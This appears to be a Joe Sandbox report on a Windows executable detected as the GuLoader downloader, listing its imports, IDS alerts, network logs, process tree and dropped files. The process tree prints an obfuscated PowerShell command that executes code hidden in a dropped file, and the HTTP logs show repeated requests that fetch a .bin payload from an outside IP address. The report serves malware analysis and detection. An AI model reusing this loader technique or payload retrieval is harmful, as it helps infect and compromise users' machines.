ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Version Infos

Description	Data
Comments	tripod eksklusives
FileVersion	3.4.0.0
InternalName	antibiotikaforbruget.exe
LegalCopyright	hexameron
OriginalFilename	antibiotikaforbruget.exe
ProductName	blokkryptografis indsendelserne ibenholtsfljtes
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-10T12:54:06.636646+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49694	69.55.55.247	80	TCP
2025-03-10T12:54:28.155196+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49695	69.55.55.247	80	TCP
2025-03-10T12:54:49.686354+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49696	69.55.55.247	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 12:53:45.248723984 CET	49694	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:53:45.254070997 CET	80	49694	69.55.55.247	192.168.2.9
Mar 10, 2025 12:53:45.254156113 CET	49694	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:53:45.254409075 CET	49694	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:53:45.259433031 CET	80	49694	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:06.636569023 CET	80	49694	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:06.636646032 CET	49694	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:06.637242079 CET	49694	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:06.642234087 CET	80	49694	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:06.759088993 CET	49695	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:06.764504910 CET	80	49695	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:06.764617920 CET	49695	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:06.765281916 CET	49695	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:06.770283937 CET	80	49695	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:28.155067921 CET	80	49695	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:28.155195951 CET	49695	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:28.155282974 CET	49695	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:28.160736084 CET	80	49695	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:28.281379938 CET	49696	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:28.286706924 CET	80	49696	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:28.286861897 CET	49696	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:28.286937952 CET	49696	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:28.292107105 CET	80	49696	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:49.686297894 CET	80	49696	69.55.55.247	192.168.2.9
Mar 10, 2025 12:54:49.686353922 CET	49696	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:51.343750000 CET	49696	80	192.168.2.9	69.55.55.247
Mar 10, 2025 12:54:51.348840952 CET	80	49696	69.55.55.247	192.168.2.9

HTTP Request Dependency Graph

69.55.55.247

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49694	69.55.55.247	80	424	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 10, 2025 12:53:45.254409075 CET	182	OUT	GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: 69.55.55.247 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49695	69.55.55.247	80	424	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 10, 2025 12:54:06.765281916 CET	182	OUT	GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: 69.55.55.247 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49696	69.55.55.247	80	424	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Mar 10, 2025 12:54:28.286937952 CET	182	OUT	GET /UXSkysDzBMaMrVXGKY103.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: 69.55.55.247 Cache-Control: no-cache

Target ID:	0
Start time:	07:52:43
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\qNNwDeb9BY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qNNwDeb9BY.exe"
Imagebase:	0x400000
File size:	917'121 bytes
MD5 hash:	A0D3DE348DD8C0374E58D275A1275359
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:52:45
Start date:	10/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Spritapparatets=gc -Raw 'C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For';$Mindehjtidelighedens=$Spritapparatets.SubString(69888,3);.$Mindehjtidelighedens($Spritapparatets)"
Imagebase:	0xf10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1437068539.000000000B0FC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:52:45
Start date:	10/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff74be10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:53:17
Start date:	10/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff78b730000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	07:53:39
Start date:	10/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xbc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2117314337.000000000537C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qNNwDeb9BY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnoh4m5h.d32.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_womdpb0l.zr3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtxdd4of.vfs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsi4ch1w.1z4.ps1

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Albanernes135.txt

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Bassianus17.jpg

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Brandsikreste138.mal

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\rigsraadsslgtens.spr

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\sanpoil.ini

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\vilars.txt

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\wastine.jpg

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Earthquave.jpg

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Renato.ini

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Stangendes.emm

Windows Analysis Report
qNNwDeb9BY.exe